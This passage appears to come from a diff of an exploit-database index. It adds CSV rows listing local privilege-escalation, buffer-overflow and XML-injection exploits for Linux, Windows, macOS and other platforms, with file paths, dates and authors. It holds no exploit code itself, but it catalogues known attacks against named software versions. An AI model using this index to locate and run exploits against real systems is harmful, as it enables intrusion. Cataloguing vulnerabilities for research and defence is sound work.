Escalation (SUID Method)",2016-10-21,"Robin Verton",local,linux, +40627,exploits/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",local,win_x86, +40630,exploits/windows/local/40630.py,"Network Scanner 4.0.0 - Local Buffer Overflow (SEH)",2016-10-25,n30m1nd,local,windows, +40634,exploits/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",local,linux, +40636,exploits/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,local,windows, +40653,exploits/osx/local/40653.txt,"Apple OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",local,osx, +40655,exploits/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",local,windows, +40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Stack Buffer Overflow Callback / Privilege Escalation",2016-10-31,"Google Security Research",local,windows, +40669,exploits/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Local Privilege Escalation",2016-10-31,"Google Security Research",local,macos, +40678,exploits/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",local,linux, +40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",local,multiple, +40688,exploits/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Local Privilege Escalation (Metasploit)",2016-11-02,Metasploit,local,linux, +40679,exploits/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' System User Privilege Escalation",2016-11-01,"Dawid Golunski",local,linux, +40710,exploits/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation",2016-11-04,"Hector X. Monsegur",local,aix, +40838,exploits/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)",2016-10-26,"Phil Oester",local,linux, +40759,exploits/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,local,linux, +40741,exploits/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,local,windows, +40765,exploits/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",local,windows, +40788,exploits/linux/local/40788.txt,"Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation",2016-11-18,"Google Security Research",local,linux, +40789,exploits/linux/local/40789.txt,"Palo Alto Networks PanOS - 'root_reboot' Local Privilege Escalation",2016-11-18,"Google Security Research",local,linux, +40807,exploits/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",local,windows, +40810,exploits/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,local,linux, +40811,exploits/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,local,lin_x86-64, +40812,exploits/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation",2013-12-16,spender,local,linux, +40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux, +40847,exploits/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",local,linux, +40848,exploits/windows/local/40848.java,"WinPower 4.9.0.4 - Local Privilege Escalation",2016-11-29,"Kacper Szurek",local,windows, +40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows, +40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows, +40861,exploits/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows, +40863,exploits/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,local,windows, +40864,exploits/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,local,windows, +40865,exploits/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,local,windows, +40871,exploits/lin_x86-64/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,local,lin_x86-64, +40873,exploits/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,local,windows, +40902,exploits/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",local,windows, +40903,exploits/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - Local Buffer Overflow (SEH)",2016-12-10,malwrforensics,local,windows, +40921,exploits/linux/local/40921.sh,"Nagios < 4.2.4 - Local Privilege Escalation",2016-12-15,"Dawid Golunski",local,linux, +40931,exploits/multiple/local/40931.txt,"iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",local,multiple, +40937,exploits/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",local,linux, +40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM' / 'RSSMON' Command Injection (Shellshock)",2016-12-18,"Hacker Fantastic",local,linux, +40943,exploits/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux, +40950,exploits/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation",2016-12-22,"Hector X. Monsegur",local,aix, +40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",local,linux, +40956,exploits/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",local,macos, +40957,exploits/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",local,macos, +40962,exploits/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",local,linux, +40967,exploits/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",local,windows, +40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,local,windows, +41015,exploits/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",local,windows, +41020,exploits/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,local,win_x86-64, +41021,exploits/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,local,multiple, +41022,exploits/linux/local/41022.txt,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",local,linux, +41076,exploits/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",local,linux, +41090,exploits/windows/local/41090.py,"SentryHD 02.01.12e - Local Privilege Escalation",2017-01-18,"Kacper Szurek",local,windows, +41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android, +41144,exploits/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",local,windows, +41149,exploits/osx/local/41149.txt,"Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution",2017-01-23,"Filippo Cavallarin",local,osx, +41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux, +41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux, +41158,exploits/linux/local/41158.txt,"Man-db 2.6.7.1 - Local Privilege Escalation (PoC)",2015-12-02,halfdog,local,linux, +41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",local,linux, +41173,exploits/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation",2017-01-26,"Federico Bento",local,linux, +41176,exploits/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",local,windows, +41196,exploits/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",local,linux, +41207,exploits/windows/local/41207.txt,"Viscosity 1.6.7 - Local Privilege Escalation",2017-01-31,"Kacper Szurek",local,windows, +41217,exploits/android/local/41217.txt,"Google Android - RKP EL1 Code Loading Bypass",2017-02-01,"Google Security Research",local,android, +41221,exploits/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,local,windows, +41240,exploits/linux/local/41240.sh,"ntfs-3g (Debian 9) - Local Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",local,linux, +41265,exploits/windows/local/41265.py,"IVPN Client 2.6.1 - Local Privilege Escalation",2017-02-06,"Kacper Szurek",local,windows, +41320,exploits/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Local Privilege Escalation",2017-02-12,LiquidWorm,local,windows, +41321,exploits/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,local,windows, +41349,exploits/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Local Privilege Escalation",2017-02-14,"Kacper Szurek",local,windows, +41356,exploits/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",local,linux, +41435,exploits/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,local,linux, +41458,exploits/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",local,linux, +41476,exploits/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Local Privilege Escalation",2017-02-28,Pcchillin,local,windows, +41538,exploits/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Local Privilege Escalation",2017-03-06,"Kacper Szurek",local,windows, +41542,exploits/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation",2017-03-07,"Parvez Anwar",local,windows, +41597,exploits/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",local,linux, +41605,exploits/win_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,local,win_x86-64, +41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows, +41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, +41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, +41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, +41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, +41701,exploits/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)",2014-12-16,Metasploit,local,windows, +41702,exploits/windows/local/41702.rb,"Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)",2013-03-12,Metasploit,local,windows, +41704,exploits/windows/local/41704.rb,"EMC Replication Manager < 5.3 - Command Execution (Metasploit)",2011-02-27,Metasploit,local,windows, +41706,exploits/windows/local/41706.rb,"Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)",2015-12-08,Metasploit,local,windows, +41707,exploits/windows/local/41707.rb,"CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)",2011-07-25,Metasploit,local,windows, +41708,exploits/windows/local/41708.rb,"Lenovo System Update - Local Privilege Escalation (Metasploit)",2015-04-12,Metasploit,local,windows, +41709,exploits/windows/local/41709.rb,"Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit)",2013-01-31,Metasploit,local,windows, +41710,exploits/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,local,windows, +41711,exploits/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,local,windows, +41712,exploits/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,local,windows, +42555,exploits/ios/local/42555.txt,"Apple iOS < 10.3.1 - Kernel",2017-08-26,"Zimperium zLabs Team",local,ios, +41887,exploits/windows/local/41887.txt,"VirusChaser 8.0 - Local Buffer Overflow (SEH)",2017-04-14,0x41Li,local,windows, +42305,exploits/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation",2017-07-10,"Paul Taylor",local,linux, +41886,exploits/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation",2017-04-15,"Nassim Asrir",local,linux, +41721,exploits/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,win_x86-64, +41722,exploits/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,win_x86-64, +41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware, +41754,exploits/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Local Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",local,hardware, +41760,exploits/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,local,linux, +41761,exploits/linux/local/41761.txt,"AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation",2016-02-19,halfdog,local,linux, +41762,exploits/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation",2016-11-22,halfdog,local,linux, +41763,exploits/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,local,linux, +41764,exploits/linux/local/41764.txt,"NTP - Local Privilege Escalation",2016-01-21,halfdog,local,linux, +41765,exploits/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,local,linux, +41766,exploits/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation",2012-10-19,halfdog,local,linux, +41770,exploits/linux/local/41770.txt,"Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation",2011-01-17,halfdog,local,linux, +41771,exploits/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Local Buffer Overflow",2017-03-29,"Daniel Teixeira",local,windows, +41772,exploits/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Local Buffer Overflow",2017-03-29,"Daniel Teixeira",local,windows, +41773,exploits/windows/local/41773.py,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Local Buffer Overflow",2017-03-29,"Daniel Teixeira",local,windows, +42087,exploits/windows/local/42087.py,"TiEmu 2.08 - Local Buffer Overflow",2017-05-30,"Juan Sacco",local,windows, +41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,local,macos, +41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",local,macos, +41870,exploits/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",local,multiple, +41871,exploits/solaris/local/41871.sh,"Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",local,solaris, +41873,exploits/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation",2017-04-13,"Hacker Fantastic",local,osx, +41875,exploits/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation",2017-04-02,"Hacker Fantastic",local,linux, +41878,exploits/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Local Privilege Escalation",2017-04-13,hyp3rlinx,local,windows, +42548,exploits/windows/local/42548.py,"Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows, +41901,exploits/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",local,windows, +41902,exploits/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",local,windows, +41904,exploits/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",local,multiple, +41907,exploits/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",local,linux, +41908,exploits/win_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",local,win_x86-64, +41917,exploits/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Local Privilege Escalation",2017-04-25,"Kacper Szurek",local,windows, +41923,exploits/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",local,linux, +41933,exploits/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",local,windows, +41951,exploits/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation",2017-05-01,"Han Sahin",local,osx, +41952,exploits/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation",2017-05-01,"Han Sahin",local,macos, +41955,exploits/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,local,linux, +41959,exploits/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,local,windows, +41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows, +41971,exploits/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,local,windows, +41973,exploits/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",local,linux, +41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux, +41995,exploits/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",local,linux, +41999,exploits/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",local,linux, +42000,exploits/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",local,windows, +42020,exploits/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",local,windows, +42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",local,linux, +42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,local,linux, +42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,local,windows, +42076,exploits/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux, +42077,exploits/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",local,windows, +42116,exploits/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",local,windows, +42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows, +42121,exploits/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,local,windows, +42141,exploits/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",local,windows, +42142,exploits/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,local,windows, +42145,exploits/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",local,multiple, +42146,exploits/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,local,macos, +42157,exploits/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,local,windows, +42160,exploits/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,local,windows, +42161,exploits/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,local,windows, +42163,exploits/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,local,windows, +42174,exploits/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Local Buffer Overflow (SEH)",2017-06-13,abatchy17,local,windows, +42181,exploits/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,local,windows, +42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux, +42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-06-26,"Juan Sacco",local,linux, +42265,exploits/linux/local/42265.py,"Flat Assembler 1.7.21 - Local Buffer Overflow",2017-06-28,"Juan Sacco",local,linux, +42267,exploits/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,local,windows, +42270,exploits/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,solaris_x86, +42271,exploits/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,openbsd, +42273,exploits/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' Stack Clash",2017-06-28,"Qualys Corporation",local,lin_x86, +42274,exploits/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,lin_x86, +42275,exploits/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,lin_x86-64, +42276,exploits/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,lin_x86, +42542,exploits/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Local Privilege Escalation",2017-08-22,LiquidWorm,local,windows, +42310,exploits/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Local Privilege Escalation",2017-07-10,LiquidWorm,local,windows, +42319,exploits/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Local Privilege Escalation",2017-07-13,geoda,local,windows, +42325,exploits/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",local,windows, +42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",local,macos, +42356,exploits/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",local,linux, +42357,exploits/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",local,linux, +42368,exploits/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,local,win_x86-64, +42382,exploits/windows/local/42382.rb,"Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",local,windows, +42549,exploits/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows, +42385,exploits/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,local,windows, +42407,exploits/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",local,multiple, +42418,exploits/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,local,windows, +42424,exploits/linux/local/42424.py,"DNSTracer 1.9 - Local Buffer Overflow",2017-08-03,j0lama,local,linux, +42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, +42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, +42429,exploits/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,local,windows, +42432,exploits/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,local,windows, +42435,exploits/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,local,win_x86-64, +42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 